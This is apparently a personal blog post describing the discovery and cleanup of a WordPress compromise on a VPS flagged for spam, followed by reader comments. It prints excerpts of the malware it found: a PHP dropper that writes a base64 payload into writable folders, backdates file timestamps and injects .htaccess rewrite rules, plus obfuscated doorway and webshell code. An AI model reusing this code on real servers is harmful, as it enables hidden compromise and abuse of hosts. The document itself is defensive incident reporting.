VPS Used To Send Spam Email Messages

Today morning, I got a shocking message from servermania.

“New support ticket was created

Subject: Abuse – 23.236…….

Hello,

This message is to notify you that your server located at 23.236……. is now in violation of our Terms of Service located at http://www.servermania.com/tos.htm‎ and is subject to account suspension leading up to termination without notice.

You are required to reply to this message in 24 hours to avoid service suspension and acknowledge the abuse will stop immediately. I have enclosed/attached the supporting documents in this claim.

Hi Abuse Team,

This is an RBL nomination for the following lists of IP addresses that are in the process of being listed to the RBL as a spam source and/or is an originating spam source in progress.

— IPs listed to the RBL —
23.236…….

— End of IPs listed to the RBL —

Please refer to below information for representative spam samples.

Additional samples are available upon request from an authoritative requestor.

Filename: B2NETSOLUTIONS.zip

Password: novirus

— Example of spam mail —

Spam Sample #1 – [23.236…….]

Received: from [23.236…….] by via sendmail with smtp;
for 1 recipient; Thu, 28 Aug 2014 22:18:21 -0000
Date: Thu, 28 Aug 2014 22:20:11 +0000
From: <>
Reply-To: <>
Message-ID:
To:
Subject: Re: Haha Sluts pissing and fucking
X-Priority: 3 (Normal)
MIME-Version: 1.0
Content-Type: text/html; charset=”iso-8859-1″
Content-Transfer-Encoding: 8bit
— End of Example of spam mail —
— Network Information —
Consolidated result Net: 1 Poc: 1
Name B2NETSOLUTIONS
NetRange 23.236……..0 – 23.236…..5
…..

I certify that I have followed the procedures and criteria required for listing these IP addresses in the Trend Micro/ MAPS RBL.
Best Regards,
Dionisio Josel S. Garcia
Trend Micro Inc.
Best Regards,”

Luckily, my sever had not yet been suspended. So, I rushed off an email to servermania telling them I was looking into the matter.

After meticulously looking at the WordPress files, I noticed a few files that looked odd.

To make sure that these were not legitimate WordPress files, I downloaded a fresh WordPress.zip file and opened it in explorer.

There were three files that appeared odd:
“exec__root.php”, “maink.php” and “answers.php”.

The exec__root.php file appears to be the brain behind the process. It says this (excerpt):


ignore_user_abort(true);
set_time_limit(0);
$dirs = array();

function Check($dir, $dirs)
{
$ls = scandir($dir);
$ls = array_diff($ls, array(
'.',
'..'
));
foreach($ls as $line)
{
$line = $dir . '/' . $line;
if (is_writable($line) && is_dir($line) && !is_link($line))
{
$dirs[] = $line;
if ($line != $dir) check($line, $dirs);
}
}

return $dirs;
}

function CheckUrl($adress, $checkStr)
{
if ($curl = curl_init())
{
curl_setopt($curl, CURLOPT_URL, 'http://' . $adress);
curl_setopt($curl, CURLOPT_RETURNTRANSFER, true);
$out = curl_exec($curl);
curl_close($curl);
if (strpos($out, $checkStr) !== false)
{
return 'true';
}
else return 'false0';
}
else return 'false1';
}

function EditHtaccess($fileData)
{
$htaccessPath = $_SERVER['DOCUMENT_ROOT'] . '/.htaccess';
if (file_exists($htaccessPath))
{
chmod($htaccessPath, 0777);
if (is_writable($htaccessPath))
{
$htaccessData = file_get_contents($htaccessPath);
$htaccessTime = filemtime($htaccessPath);
$appendData = $fileData . "n" . $htaccessData;
$ff = fopen($htaccessPath, 'w');
fwrite($ff, $appendData);
fclose($ff);
touch($htaccessPath, $htaccessTime);
chmod($htaccessPath, 0444);
}
}
else
{
$htaccessTime = filemtime($_SERVER['DOCUMENT_ROOT']);
$appendData = $htaccessData;
$ff = fopen($htaccessPath, 'w');
fwrite($ff, $appendData);
fclose($ff);
touch($htaccessPath, $htaccessTime);
chmod($htaccessPath, 0444);
}
}

function ProcessDir($dir, $fileName)
{
$fileData='PD9waHAgJEdMT0JBTFNbJ19oZmhoZmhfJ109QXJyYXkoYmFzZTY0X2RlY29kZSgnWScgLidtRnpaVFkwWDInIC4nUmxZMjknIC4na1pRPScgLic9JyksYmFzZTY0X2RlY29kZSgnWScgLidtRnpaVCcgLidZMFgyUmxZMjlrWlE9PScpLGJhc2U2NF9kZWNvZGUoJ1knIC4nbUZ6WlRZMFgyUmxZJyAuJzI5a1pRPScgLic9JyksYmFzZTY0X2RlY29kZSgnWW1GelpUWTBYMlJsWTI5JyAuJ2taUT09

…….

$filePath = $dir . '/' . $fileName;
$fileTime = filemtime($dir);
if ($fp = fopen($filePath, 'w'))
{
fwrite($fp, base64_decode($fileData));
fclose($fp);
touch($filePath, $fileTime);
touch($dir, $fileTime);
return $filePath;
}
else return "";
}

$dirs = check(dirname($_SERVER['DOCUMENT_ROOT'] . '/RND') , $dirs);
$mx = array();

foreach($dirs as $ln)
{
$mx[$ln] = substr_count($ln, "/");
}

arsort($mx);
$cnt=0;
foreach($mx as $dir => $depth)
{
$prDir = processDir($dir, 'answers.php');
if (strlen($prDir) > 0)
{
$prHtach=EditHtaccess('RewriteEngine on
RewriteBase /
RewriteCond %{HTTP_USER_AGENT} ^[Ww]eb[Bb]andit [OR]
RewriteCond %{HTTP_USER_AGENT} ^1-More Scanner [OR]
RewriteCond %{HTTP_USER_AGENT} ^192.comAgent [OR]
RewriteCond %{HTTP_USER_AGENT} ^Accelerator [OR]
RewriteCond %{HTTP_USER_AGENT} ^Accoona [OR]
RewriteCond %{HTTP_USER_AGENT} ^Alexibot [OR]
RewriteCond %{HTTP_USER_AGENT} ^almaden.ibm.com [OR]
RewriteCond %{HTTP_USER_AGENT} ^Ants [OR]
RewriteCond %{HTTP_USER_AGENT} ^Aport [OR]
RewriteCond %{HTTP_USER_AGENT} ^AppleWebKit [OR]
RewriteCond %{HTTP_USER_AGENT} ^archive.org [OR]
RewriteCond %{HTTP_USER_AGENT} ^Ask Jeeves [OR]

…….

RewriteRule ^(answers.php*)$ '.$dir.'/answers.php [L]');
if (CheckUrl($_SERVER['HTTP_HOST'].'/'.'answers.php' , 'You are not allowed to access this file') == 'true')
{
echo $_SERVER['HTTP_HOST'].'/'.'answers.php';
exit();
}
}
$cnt++;
if($cnt>3)
{
$prDir = processDir($_SERVER['DOCUMENT_ROOT'], 'answers.php');
if (CheckUrl($_SERVER['HTTP_HOST'].'/'.'answers.php' , 'You are not allowed to access this file') == 'true')
{
echo $_SERVER['HTTP_HOST'].'/'.'answers.php';
exit();
}
else
{
echo '!!!error!!!';
exit();
}
}
}
?>

The answers.php appears to be an encrypted file with this in it (excerpt):



……..

……..

;$GLOBALS[hfhhfh(335)][58](asdaasda__0(87));$GLOBALS[hfhhfh(336)][59](asdaasda__0(88));$GLOBALS[hfhhfh(337)][60](asdaasda__0(89) .$GLOBALS[hfhhfh(338)][61](asdaasda__0(90)) .asdaasda__0(91));$GLOBALS[hfhhfh(339)][62](asdaasda__0(92));$GLOBALS[hfhhfh(340)][63](asdaasda__0(93) .$GLOBALS[hfhhfh(341)][64]($jghjgh_6,asdaasda__0(94),$jghjgh_29));exit;}else{$jghjgh_21=0;return $jghjgh_23;}} ?>

The maink.php file is also an encrypted file of some sort with this in it (excerpt):


$auth_pass = "63a9f0ea7bb98050796b649e85481845";
$color = "#df5";
$default_action = 'FilesMan';
$default_use_ajax = true;
$default_charset = 'Windows-1251';
$xYEzDu6r3EZT="GR5yYXp3YH17ejRne3h9cGdgdWBxPDB5dX9xYWQ9NG8ZHjQ0ND

……

oelhTbGVNakV5T1RRd05USXdOQ2twTzMxbGRtRnNLQ1I0YzFacFZFOWlObWcwVGlrNyIpKTs="));
return;
?>

I also noted that the .htaccess file appeared to be modified. It said this (excerpt):


RewriteCond %{HTTP_USER_AGENT} ^[Ww]eb[Bb]andit [OR]
RewriteCond %{HTTP_USER_AGENT} ^1-More Scanner [OR]
RewriteCond %{HTTP_USER_AGENT} ^192.comAgent [OR]
RewriteCond %{HTTP_USER_AGENT} ^Accelerator [OR]
RewriteCond %{HTTP_USER_AGENT} ^Accoona [OR]
RewriteCond %{HTTP_USER_AGENT} ^Alexibot [OR]
RewriteCond %{HTTP_USER_AGENT} ^almaden.ibm.com [OR]
RewriteCond %{HTTP_USER_AGENT} ^Ants [OR]
RewriteCond %{HTTP_USER_AGENT} ^Aport [OR]
RewriteCond %{HTTP_USER_AGENT} ^AppleWebKit [OR]
RewriteCond %{HTTP_USER_AGENT} ^archive.org [OR]
RewriteCond %{HTTP_USER_AGENT} ^Ask Jeeves [OR]
RewriteCond %{HTTP_USER_AGENT} ^asterias [OR]
RewriteCond %{HTTP_USER_AGENT} ^attach [OR]
RewriteCond %{HTTP_USER_AGENT} ^BabalooSpider [OR]
RewriteCond %{HTTP_USER_AGENT} ^BackDoorBot [OR]
RewriteCond %{HTTP_USER_AGENT} ^BackWeb [OR]

……

……..


RewriteCond %{HTTP_USER_AGENT} ^Xaldon WebSpider [NC,OR]
RewriteCond %{HTTP_USER_AGENT} zermelo [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^Zeus [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^Zeus.*Webster [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ZyBorg [NC]
RewriteRule ^.*$ - [R=404,L]
RewriteEngine On
RewriteCond %{REQUEST_FILENAME} !-d
RewriteCond %{REQUEST_FILENAME} !-f
RewriteRule ^(answers.php*)$ /var/www/mysite.com/htdocs/wp-content/answers.php [L]”

The access.log showed these entries:


GET /answers.php?num=obrazec-zayavleniya-o-soglasii-vyti-iz-otpuska.html HTTP/1.1" 404 134 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)


GET /answers.php?num=mercedes-benz-w123-1976-1985-instrukciya-po.html HTTP/1.1" 404 134 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"


GET /HD_vids.htm HTTP/1.1" 200 8206 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)

After comfirming with my other WordPress installations that the said three files were unnatural, I deleted all of them. I also deleted the .htaccess file.

To ensure that there were no other such files lurking about, I used the command


find / -name answers.php

etc to find and delete all files.

Then I installed the Linux Malware Detect” or “Maldet” antivirus scanner using the guide given here. Maldet reported that it detected four infected files:


FILE HIT LIST:
{HEX}base64.inject.unclassed.7 : /home/mysite/public_html/images/config.php
{HEX}php.cmdshell.cih.218 : /home/mysite/public_html/images/mysql_class.php
{HEX}php.cmdshell.unclassed.352 : /home/mysite/public_html/images/pack2.php
{HEX}php.cmdshell.unclassed.352 : /home/mysite/public_html/images/pack.php
===============================================
Linux Malware Detect v1.4.2 < proj@rfxn.com >

There appears to be a deadly virus hidden in this because as soon as I tried to download the file to my desktop, AVG AntiVirus flashed a warning that it was the “PHP/BackDoor Shell”.

I deleted the folder containing the files after ensuring that I had backups of the cleap copies.

I then sent a confirmation letter to servermania and they closed the abuse ticket.

Hopefully, my VPS is clean now and no more spam messages will be sent.

3 thoughts on “VPS Used To Send Spam Email Messages

  1. Denis

    Hello,

    The files are familiar. Almost the same as what I found on another compromised server.

    exec__root.php – created answers.php and injects doorway rules to .htaccess file.
    answers.php – doorway generator. Fetches spammy content from a remote server based on the URL parameters passed to it (you can see it in the logs).
    maink.php – webshell

    But I don't see anything that could send email spam…

  2. admin

    I don't know. I have been thinking hard about it. Haven't figured it out. Hope it doesn't happen again.

Leave a Reply

Your email address will not be published. Required fields are marked *